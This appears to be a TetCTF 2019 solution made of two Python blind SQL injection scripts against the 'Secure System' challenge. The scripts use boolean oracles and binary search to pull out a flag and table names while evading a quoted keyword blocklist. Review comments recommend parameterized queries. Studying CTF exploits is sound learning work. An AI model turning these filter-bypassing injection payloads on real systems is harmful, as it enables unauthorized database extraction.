Solution to Secure System - TetCTF 2019
import requests | |
sess = requests.Session()  # one HTTP session reused for every probe against the challenge host
URL = 'http://45.77.240.178:8002'  # TetCTF 2019 "Secure System" challenge endpoint (value from the page)
# Row-comparison template. The `{flag}` slot is filled by the loop below with a hex
# literal of the current guess; the whole expression evaluates to the comparison
# result plus 1, and the server's reply text is what distinguishes the two outcomes.
# NOTE(review): the `id` value is spliced straight into the statement server-side;
# a parameterized query would make it inert and remove this oracle entirely.
payload = '''((SELECT 1,CONCAT({flag}, CAST("0" as JSON))) <= (SELECT * FROM `Th1z_Fack1n_Fl4444g_Tabl3`))+1'''
def try_payload(payload):
    """Send *payload* as the ``id`` form field and report whether the guest
    greeting is absent from the reply.

    The absence of ``'Hello guest'`` is the boolean this script keys on;
    the request goes through the module-level ``sess`` to ``URL``.
    """
    reply = sess.post(URL, data={'id': payload})
    greeting_absent = 'Hello guest' not in reply.text
    return greeting_absent
ASCIIAlphabet = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz}"  # candidates, tried in this order
flag2 = 'TETCTF{0WL_D0NKEY_MEANS_LIARRRRRRR}'  # not read anywhere in this script; presumably recorded from elsewhere
flag = 'TetCTF{0wl_d0nkey_m'  # already-recovered prefix that the loop extends one character per pass
last_c = ''  # candidate tried just before the oracle flipped; appended to `flag` on the flip
# Each pass walks the alphabet in order until try_payload() first returns True; the
# character tried just before that flip is taken as the next one. Python 2 only:
# str.encode('hex') does not exist on Python 3 str.
# NOTE(review): the outer loop has no exit condition; it must be stopped by hand.
while True:
    for c in ASCIIAlphabet:
        # print('try: %s' %c)
        t = flag + c
        t = '0x'+t.encode('hex')  # MySQL hex-literal form of the guessed prefix
        if try_payload(payload.format(flag=t)):
            flag += last_c
            print(flag)
            last_c = ''
            break
        last_c = c
import requests, urllib, re, sys | |
sess = requests.Session()  # one HTTP session reused for every probe
fancy_console = False  # when True, printInPlace() overwrites the current terminal cell instead of staying silent
URL = 'http://45.77.240.178:8002'  # TetCTF 2019 challenge endpoint (value from the page)
# Template for one boolean probe. Three slots are filled at different times:
#   {variable}  - by gen_payload() via str.format
#   @wOFFSET@   - by findNames() via str.replace (1-based character position)
#   @cORD@      - by findName() via str.replace (ordinal of the candidate character)
# The expression compares one character of {variable} against @cORD@; the *1111
# and EXP() turn the boolean into a value the server's reply text distinguishes.
# NOTE(review): keyword-free payload shapes like this are why a blocklist filter on
# the input is not a fix; the statement must be parameterized server-side.
payload = '''EXP(
(CONV(
HEX(
SUBSTR({variable},@wOFFSET@,1)
),16,10
)<=@cORD@)
*1111)+1'''
# Candidate alphabets for the binary search in findName(). Each begins with "\001",
# which findNames() treats as the "no character here" sentinel (see `c == alphabet[0]`).
# The "\]" in ASCIIAlphabet is not a valid Python escape and stays as a literal backslash + ']'.
ASCIIAlphabet = "\001 !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~"
simpleAlphabet = "\001abcdefghijklmnopqrstuvwxyz"
HEXAlphabet = "\0010123456789abcdef"
advancedAlphabet= "\0010123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz"
def gen_payload(variable):
    """Fill the ``{variable}`` slot of the module-level ``payload`` template
    and collapse every run of whitespace (including the template's newlines)
    into a single space."""
    filled = payload.format(variable=variable)
    whitespace_run = re.compile(r'\s+')
    return whitespace_run.sub(' ', filled)
def check_char(id):
    """Unfinished stub: accepts an argument and always returns ``None``.

    Not called anywhere in this file. (``id`` shadows the builtin, kept for
    interface compatibility.)
    """
    return None
def printInPlace(alert):
    """Echo *alert* and back the cursor up over it so the next write overwrites
    it; a no-op unless the module-level ``fancy_console`` flag is set.

    Returns the value of ``fancy_console`` either way.
    """
    if not fancy_console:
        return fancy_console
    backspaces = "\b" * len(alert)
    sys.stdout.write("{}{}".format(alert, backspaces))
    sys.stdout.flush()
    return fancy_console
def tryPayload(payload):
    """Post *payload* as the ``id`` form field and report whether the reply
    contains the guest greeting.

    Note the polarity: ``True`` means ``'Hello guest'`` IS present. Uses the
    module-level ``sess`` and ``URL``.
    """
    reply = sess.post(URL, data={'id': payload})
    greeting_present = 'Hello guest' in reply.text
    return greeting_present
#bin-search ASCII inside [alphabet]
def findName(payload, alphabet):
    """Binary-search one character of the probed value over *alphabet*.

    *payload* must still contain the ``@cORD@`` slot; each probe fills it with
    the ordinal of the midpoint candidate and asks tryPayload(). A ``True``
    answer moves the lower bound up, so the search converges on the lowest
    candidate for which the probe is false. Returns that alphabet entry
    (``alphabet[0]`` if every probe answered ``False``).

    Cost: about log2(len(alphabet)) requests per character.
    """
    a = 0
    b = len(alphabet)-1
    while (a < b):
        mid = (a+b)//2
        c = alphabet[mid]
        printInPlace(c)  # progress display only; silent unless fancy_console
        if tryPayload(payload.replace("@cORD@", str(ord(c)))):
            a = mid + 1
        else:
            b = mid
    return alphabet[a]
def findNames(payload, alphabet):
    """Recover up to ten result rows, character by character, printing as it goes.

    *payload* must still contain the ``@rOFFSET@`` (row index) and ``@wOFFSET@``
    (1-based character position) slots. For each row 0..9 the inner loop reads
    positions 1..199 with findName() until it returns ``alphabet[0]``, which is
    treated as "no more characters". Extraction stops entirely once a row comes
    back with at most one character. Returns ``None``; output goes to stdout.
    """
    for result_offset in range(0, 10):
        result = ""
        pl = payload.replace("@rOFFSET@", str(result_offset))
        for word_offset in range(1, 200):
            pl2 = pl.replace("@wOFFSET@", str(word_offset))
            c = findName(pl2, alphabet)
            # print(c)
            if c == alphabet[0]: break  # sentinel: end of this row's value
            print(c, end='')
            sys.stdout.flush()
            # sys.stdout.write(c)
            # sys.stdout.flush
            result+=c
        print(" ")
        if len(result) <= 1: break  # an (almost) empty row is taken as "no more rows"
    return
# filter
# preg_match('/and|or|in|if|case|sleep|benchmark/is' , $_POST['id'])
# preg_match('/order.+?by|union.+?select/is' , $_POST['id'])
# Th1z_Fack1n_Fl4444g_Tabl3
# Entry point: list table names from sys.x$schema_flattened_keys, one row per
# @rOFFSET@, using the alphanumeric+underscore alphabet.
# NOTE(review): the two preg_match() lines above are a keyword blocklist; the
# payload template in this file contains none of those words, which illustrates
# why input blocklists do not substitute for parameterized queries.
findNames(gen_payload('''(select table_name from sys.x$schema_flattened_keys LIMIT @rOFFSET@, 1)'''), advancedAlphabet)
# retrieve others' solutions
# findNames(gen_payload('''(select query from sys.`x$statement_analysis` where query like '%Th1z_Fack1n_Fl4444g_Tabl3%' LIMIT @rOFFSET@, 1)'''), ASCIIAlphabet)